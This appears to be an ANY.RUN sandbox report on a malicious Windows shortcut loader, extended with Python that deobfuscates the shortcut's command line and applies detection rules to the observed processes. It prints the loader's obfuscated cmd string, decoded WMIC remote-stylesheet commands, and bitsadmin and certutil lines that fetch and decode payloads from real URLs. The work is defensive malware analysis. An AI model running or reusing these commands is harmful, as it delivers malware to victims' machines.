File name: Comprovante_Zattini.390.lnk
Full analysis: https://app.any.run/tasks/90b3e40b-f5cf-4b08-872b-14165186619c
Verdict: Malicious activity
Threats: Loader

A loader is malicious software that infiltrates devices to deliver malicious payloads. It can infect victims' computers, profile the system, and install other threats such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to trick users into downloading and running them. Loaders employ evasion and persistence tactics to avoid detection. In this sample the loader is a Windows shortcut (.lnk) whose command line runs WMIC with a remote XSL stylesheet; the script in that stylesheet then fetches payloads with bitsadmin, decodes them with certutil and loads one with regsvr32.

Analysis date: May 24, 2019, 14:06:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, trojan, apt
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=23, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5: A48A820F22CEB01A84A7E873ECC227DD
SHA1: 86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB
SHA256: 018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9
SSDEEP: 48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Runs an application for hidden code execution
      • cmd.exe (PID: 2988)
    • Uses BITSADMIN.EXE to download an application
      • WMIC.exe (PID: 2212)
    • Registers / runs a DLL via REGSVR32.EXE
      • WMIC.exe (PID: 2212)
  • SUSPICIOUS
    • Application launched itself
      • WMIC.exe (PID: 1944)
    • Starts CertUtil to decode files
      • WMIC.exe (PID: 2212)
    • Starts CMD.EXE for command execution
      • cmd.exe (PID: 2988)
      • WMIC.exe (PID: 2212)
    • Executable content was dropped or overwritten
      • certutil.exe (PID: 3104)
      • certutil.exe (PID: 2952)
  • INFO
    • No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: dedicado-web
IconFileName: %SystemRoot%\system32\imageres.dll
CommandLineArguments: /start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|%ComSpec%"
Description: bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY
LocalBasePath: C:\Windows\System32\cmd.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 23
TargetFileSize: 302592
ModifyDate: 2010:11:21 04:24:03+01:00
AccessDate: 2010:11:21 04:24:03+01:00
CreateDate: 2010:11:21 04:24:03+01:00
(TargetFileSize and the three dates are copied from the link target, cmd.exe, when the shortcut is written; they are not the shortcut file's own timestamps and say nothing about when the lure was built.)
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
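The CommandLineArguments field above is the whole loader: cmd.exe assigns a junk-padded string to x with `set x=...`, then `echo %x:usf6=%` strips every "usf6" (cmd's %var:search=replace% substring replacement) and pipes the cleaned text into a second cmd.exe, which runs it. Because cmd.exe executes each side of a pipe in its own `cmd /S /D /c"..."` child, the echo side appears as a separate process and the right-hand cmd.exe, with no arguments, reads the WMIC command from stdin. The following Python is an added example and not part of the ANY.RUN report: it reads the StringData of a Shell Link (.lnk) per MS-SHLLINK, reconstructs the command with cmd's replacement semantics, and pulls out the /format: URL that WMIC will fetch as an XSL stylesheet. The `build_lnk` helper fabricates a minimal .lnk for offline testing (only Description and CommandLineArguments; the real sample also carries an IDList, LinkInfo, IconLocation and ExtraData, which the parser skips or ignores). The cp1252 fallback for non-Unicode shortcuts is an assumption.

```python
"""Added example, not part of the ANY.RUN report: read the StringData of a
Shell Link (.lnk) and undo the cmd.exe %var:str=% junk-removal obfuscation
used by this sample's CommandLineArguments."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) and the Shell Link CLSID, little-endian.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# CommandLineArguments copied verbatim from the report's EXIF/LNK block.
OBFUSCATED_ARGS = r'''/start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|%ComSpec%"'''


def build_lnk(description, args, show_cmd=7, icon_index=23):
    """Constructed test input: a minimal Unicode .lnk carrying only a
    Description and CommandLineArguments (no IDList, LinkInfo or ExtraData).
    show_cmd 7 is SW_SHOWMINNOACTIVE, the 'Show Minimized No Activate' above."""
    flags = HAS_NAME | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 302592, icon_index, show_cmd, 0, 0, 0, 0)

    def string_data(s):  # CountCharacters (uint16) followed by UTF-16LE chars
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(description) + string_data(args)


def parse_lnk(data):
    """Header fields plus every StringData member present in the file."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    file_size, icon_index, show_cmd = struct.unpack_from("<III", data, 52)
    pos = 0x4C
    if flags & HAS_ID_LIST:    # skip LinkTargetIDList: uint16 size + item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo: its first uint32 is the total size
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "file_size": file_size,
           "icon_index": icon_index, "show_cmd": show_cmd}
    for name, bit in (("description", HAS_NAME), ("relative_path", HAS_REL_PATH),
                      ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                      ("icon_location", HAS_ICON)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            out[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:  # ANSI strings use the system code page; cp1252 is an assumption
            out[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return out


def cmd_var_replace(value, search, replace=""):
    """Emulate cmd.exe %var:search=replace%: case-insensitive, every occurrence;
    a leading '*' in search drops everything up to and including the first
    occurrence of the rest of search."""
    if search.startswith("*"):
        idx = value.lower().find(search[1:].lower())
        return value if idx < 0 else replace + value[idx + len(search) - 1:]
    return re.sub(re.escape(search), lambda _: replace, value, flags=re.IGNORECASE)


def deobfuscate(args):
    """Recover the command hidden by `set x=<junked> && echo %x:junk=% | cmd`."""
    assignment = re.search(r"\bset\s+(\w+)=(.*?)\s*&&", args, re.S)
    substitution = re.search(r"%(\w+):([^=%]+)=([^%]*)%", args)
    if not (assignment and substitution
            and assignment.group(1).lower() == substitution.group(1).lower()):
        raise ValueError("no matching set/%var:a=b% pair in arguments")
    return cmd_var_replace(assignment.group(2), substitution.group(2),
                           substitution.group(3))


def remote_xsl(command):
    """The URL WMIC will fetch and execute as an XSL stylesheet, if any."""
    m = re.search(r'/format:"?(https?://[^"\s]+)', command, re.I)
    return m.group(1) if m else None


if __name__ == "__main__":
    sample = build_lnk("bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY",
                       OBFUSCATED_ARGS)
    info = parse_lnk(sample)
    command = deobfuscate(info["arguments"])
    print("ShowCommand:", info["show_cmd"], "IconIndex:", info["icon_index"])
    print("Decoded:", command)
    print("Remote XSL:", remote_xsl(command))
```

Running it against the report's own arguments yields exactly the command line of WMIC.exe PID 1944 below, with the doubled backslashes the author left in the padded string. Replace `build_lnk(...)` with `open(path, "rb").read()` to run it on a real shortcut; the `%ComSpec%` references survive because Explorer, not the parser, expands environment strings when it launches the link.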
All screenshots are available in the full report
Total processes: 90
Monitored processes: 31
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process nodes in the order the report lists them ("no specs" marks a process with no indicators of its own):
start → cmd.exe (no specs) → cmd.exe (no specs) → cmd.exe (no specs) → wmic.exe → wmic.exe
→ bitsadmin.exe (no specs) → certutil.exe (no specs), repeated eight times
→ bitsadmin.exe (no specs) → certutil.exe
→ bitsadmin.exe (no specs) → certutil.exe (no specs)
→ cmd.exe (no specs)
→ bitsadmin.exe (no specs) → certutil.exe
→ bitsadmin.exe (no specs) → certutil.exe (no specs)
→ regsvr32.exe (no specs) → cmd.exe (no specs) → timeout.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2988
CMD: "C:\Windows\System32\cmd.exe" /start /MIN C:\Windows\system32\cmd.exe start /MIN C:\Windows\system32\cmd.exe /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|C:\Windows\system32\cmd.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3640
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo %x:usf6=%"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
(Left-hand side of the echo | cmd pipeline: cmd.exe runs each side of a pipe in its own /S /D /c child, and this one expands %x:usf6=% now that x is set.)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3712
CMD: C:\Windows\system32\cmd.exe
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
(Right-hand side of the pipeline: started with no arguments, it reads the deobfuscated WMIC command from stdin and executes it, which is why WMIC.exe PID 1944 has cmd.exe as its parent.)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 1944
CMD: C:\\Windows\\system32\\wbem\\WMIC.exe os get f57it6hES, 67hi26a, numberofusers /format:"http://storage.googleapis.com/midgoldem/09/v.txt#025040xiuj6rl9d"
Path: C:\Windows\system32\wbem\WMIC.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749911 (0x80041017, WBEM_E_INVALID_QUERY: the properties f57it6hES and 67hi26a do not exist on Win32_OperatingSystem. The query failing does not stop the attack; the stylesheet fetched via /format: still executed, as the child WMIC.exe PID 2212 shows.)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2212
CMD: "C:\Windows\System32\wbem\WMIC.exe" os get AXFWSIIT, XCSBXQWM, QHIMBSHY, lastbootupdate /format:"http://storage.googleapis.com/midgoldem/09/vv.txt#9961769"
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID: 3544
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
PID: 2680
CMD: "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg
Path: C:\Windows\System32\certutil.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID: 4000
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
PID: 3208
CMD: "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg
Path: C:\Windows\System32\certutil.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2304
CMD: "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg.z
Path: C:\Windows\System32\bitsadmin.exe
Parent process: WMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
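Every stage of the chain above is a signed Windows binary doing something it is not normally asked to do: cmd.exe building a command with %var:a=b%, WMIC.exe loading an XSL stylesheet from a URL (MITRE ATT&CK T1220), bitsadmin.exe downloading to a user-writable folder (T1197), certutil.exe base64-decoding the result (T1140), regsvr32.exe loading it (T1218.010), and WMIC.exe acting as the parent of all of them. The following Python is an added example and not part of the ANY.RUN report: it encodes those observations as process-creation rules and runs them over the command lines printed in this report. The event layout (pid, image, parent image, command line) is an assumption modelled on Sysmon event 1; the regsvr32 event and the two benign controls are constructed, since the report shows regsvr32.exe only in the process graph, and the PID 2988 command line is abridged.

```python
"""Added example, not from the ANY.RUN report: process-creation rules for the
LOLBin chain this sample uses, evaluated over the report's command lines."""
import re


def _img(path):
    """Bare, lower-cased image name from a full path."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule takes an event dict and returns something truthy on a hit.
RULES = {
    # cmd.exe builds a string with `set x=junk` and strips the junk with %x:junk=%
    "cmd_var_obfuscation": lambda e: _img(e["image"]) == "cmd.exe"
        and re.search(r"\bset\s+\w+=", e["cmdline"], re.I)
        and re.search(r"%\w+:[^=%]+=[^%]*%", e["cmdline"]),
    # WMIC /format: with a URL fetches and executes a remote XSL (T1220)
    "wmic_remote_xsl": lambda e: _img(e["image"]) == "wmic.exe"
        and re.search(r'/format:"?\s*https?://', e["cmdline"], re.I),
    # bitsadmin /transfer used as a downloader (T1197)
    "bitsadmin_download": lambda e: _img(e["image"]) == "bitsadmin.exe"
        and re.search(r"/transfer\b.*https?://", e["cmdline"], re.I | re.S),
    # certutil decoding or fetching a payload rather than handling certificates (T1140)
    "certutil_decode": lambda e: _img(e["image"]) == "certutil.exe"
        and re.search(r"\s-(decode|decodehex|urlcache|encode)\b", e["cmdline"], re.I),
    # regsvr32 loading from a user-writable path, a URL, or via scrobj.dll (T1218.010)
    "regsvr32_user_path": lambda e: _img(e["image"]) == "regsvr32.exe"
        and re.search(r"\\(Users|ProgramData|Temp)\\|/i:https?://|scrobj\.dll",
                      e["cmdline"], re.I),
    # WMIC.exe does not normally spawn children; here it drives the whole chain
    "child_of_wmic": lambda e: _img(e["parent_image"]) == "wmic.exe",
}


def evaluate(events):
    """Sorted (pid, rule name) pairs for every rule that matches an event."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((e["pid"], name))
    return sorted(hits)


# PIDs 2988 (abridged), 1944, 2212, 3544 and 2680 are taken from this report's
# Process information; 9001 to 9003 are constructed (9001 hypothetical regsvr32
# call, 9002 and 9003 benign controls that must not fire).
SAMPLE_EVENTS = [
    {"pid": 2988, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /start /MIN C:\Windows\system32\cmd.exe start /MIN C:\Windows\system32\cmd.exe /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s ... &&echo %x:usf6=%|C:\Windows\system32\cmd.exe"'},
    {"pid": 1944, "image": r"C:\Windows\system32\wbem\WMIC.exe", "parent_image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\\Windows\\system32\\wbem\\WMIC.exe os get f57it6hES, 67hi26a, numberofusers /format:"http://storage.googleapis.com/midgoldem/09/v.txt#025040xiuj6rl9d"'},
    {"pid": 2212, "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent_image": r"C:\Windows\system32\wbem\WMIC.exe",
     "cmdline": r'"C:\Windows\System32\wbem\WMIC.exe" os get AXFWSIIT, XCSBXQWM, QHIMBSHY, lastbootupdate /format:"http://storage.googleapis.com/midgoldem/09/vv.txt#9961769"'},
    {"pid": 3544, "image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z'},
    {"pid": 2680, "image": r"C:\Windows\System32\certutil.exe", "parent_image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'"C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg'},
    {"pid": 9001, "image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\Public\Libraries\temporary\hypothetical.dll"},
    {"pid": 9002, "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic os get caption /format:list"},
    {"pid": 9003, "image": r"C:\Windows\System32\certutil.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -verify C:\certs\server.cer"},
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule}")
```

The parent/child rule is the cheapest and most robust of the set: the command-line patterns can be rewritten by the next campaign, but a WMIC.exe that spawns bitsadmin.exe, certutil.exe or regsvr32.exe has no benign explanation in a normal fleet.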
Total events: 259
Read events: 235
Write events: 24
Delete events: 0

Modification events

All ten writes are by PID 1944 (WMIC.exe), operation "write":

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
  EnableFileTracing = 0
  EnableConsoleTracing = 0
  FileTracingMask = 4294901760
  ConsoleTracingMask = 4294901760
  MaxFileSize = 1048576
  FileDirectory = %windir%\tracing

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
  EnableFileTracing = 0
  EnableConsoleTracing = 0
  FileTracingMask = 4294901760
  ConsoleTracingMask = 4294901760

These are the default RAS tracing keys that Windows creates for any process the first time it loads rasapi32.dll (WinINet pulls it in when WMIC fetches the remote stylesheet). They record that the process went on the network; they are not a persistence mechanism and are common sandbox noise.
Executable files: 2
Suspicious files: 8
Text files: 3
Unknown types: 0

Dropped files

PID | Process | Filename | Type
3208 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | binary
  MD5: F2CF0BC2A11C62AFA0FD80A3E8CD704D
  SHA256: C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
2356 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif | binary
  MD5: 3881F37A8404226070C4FA5C77193B29
  SHA256: DB1C1F2AB8C0DC5365D9EE01C758B38904643ABD3B0D462C03584FAEA73F465B
3808 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg | binary
  MD5: B3F39EEF88A5D1D3C4918E17F00C7F45
  SHA256: D02F75457DB4A054712D07A4D859185AF9C6B26472C4EEBBFD97285BE46DA127
3076 | cmd.exe | C:\Users\Public\Libraries\temporary\r1.log | text
  MD5: 6FCC95D06CBF92797C500F16EC12B8F6
  SHA256: ACAE594A6FEF0C777E710D212EFFAC0E65CE9128C5543B5233C314840E5823EC
2428 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif | binary
  MD5: 06C5E02124CAE7A72D67345F5880970C
  SHA256: C36EEA80219B821EC6DC40325844285CB3529DE7D7936E88892A8D6B65A6D8DE
4072 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdx.gif | binary
  MD5: 405572515BC32CF36CFCC9F62DB4C6E8
  SHA256: 7F804CF5BACCA1E4A0147D9D52FA7A7FDE923B4AAA7A90725067A2D45780B40A
2212 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\vv[1].txt | xml
  MD5: A523C5CEBE290B33595527B765A2B5A9
  SHA256: 6BDE1BDFC46E54FFAE9A6CDB98E572633896CE7D96A98494E977A5B5F2C3B299
2904 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwg.gif | binary
  MD5: F378C07E5D06F3B07FC59A52DE5B231B
  SHA256: 3F26FA7BA03B9A026DEB7D24866C44DEB3C84FB5B490ABB49440E381511650F3
3612 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwxb.~ | binary
  MD5: B26259F3939707FF780F5F4B00AF5A39
  SHA256: 3E5BA74875D9B3743AD4C1002822940FA890E12E22D68A5824C7B09DF3F40868
1944 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\v[1].txt | xml
  MD5: DDC4580B1727864527DA836ECFF67434
  SHA256: 65C4E0703F3911D87B731671FBAC7D7D4082DABC4907F3ABF690EBF29F892D6A

The two xml files under Temporary Internet Files\Content.IE5 are WinINet's cache copies of the stylesheets WMIC fetched through /format: (v[1].txt for PID 1944, vv[1].txt for PID 2212); they hold the script that drives the rest of the chain and are the content the IDS alerts below fired on. The certutil outputs are the base64-decoded payloads, written to the world-writable C:\Users\Public\Libraries\temporary with image extensions to look harmless in a file listing.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 24
TCP/UDP connections: 3
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 | US | - | - | whitelisted
2212 | WMIC.exe | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/09/vv.txt | US | xml | 9.88 Kb | whitelisted
- | - | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 | US | text | 308 Kb | whitelisted
- | - | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567 | US | text | 308 Kb | whitelisted
- | - | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 | US | text | 247 Kb | whitelisted
- | - | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177 | US | text | 1.19 Mb | whitelisted
- | - | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 | US | text | 68.6 Kb | whitelisted
- | - | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 | US | text | 247 Kb | whitelisted
- | - | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567 | US | text | 1.19 Mb | whitelisted
- | - | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065 | US | text | 1.37 Mb | whitelisted

Rows without a PID are the payload transfers: bitsadmin.exe only queues the job, and the BITS service inside svchost.exe performs the HEAD-then-GET fetch, so the sandbox cannot attribute them to a monitored process. "whitelisted" is the reputation of storage.googleapis.com, not of these objects; hosting the stylesheets and base64 payloads on a trusted cloud bucket, under image-like names with a .zip.log suffix and a numeric query string, is how the loader gets past domain-based filtering.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted
1944 | WMIC.exe | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted
2212 | WMIC.exe | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted

DNS requests

Domain | IP | Reputation
storage.googleapis.com | 172.217.18.16 | whitelisted

Threats

PID | Process | Class | Message
1944 | WMIC.exe | A Network Trojan was detected | ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
1944 | WMIC.exe | Misc activity | SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
2212 | WMIC.exe | A Network Trojan was detected | ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
2212 | WMIC.exe | Misc activity | SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)

All four alerts fire on the inbound stylesheet bodies (v.txt for PID 1944, vv.txt for PID 2212), which confirms that the XSL files carry obfuscated JScript that instantiates WScript.Shell. The ET rule is named for the Xbash pattern it was written against; a match means the script uses the same hex-encoded WScript.Shell construction, not that this sample is Xbash.
No debug info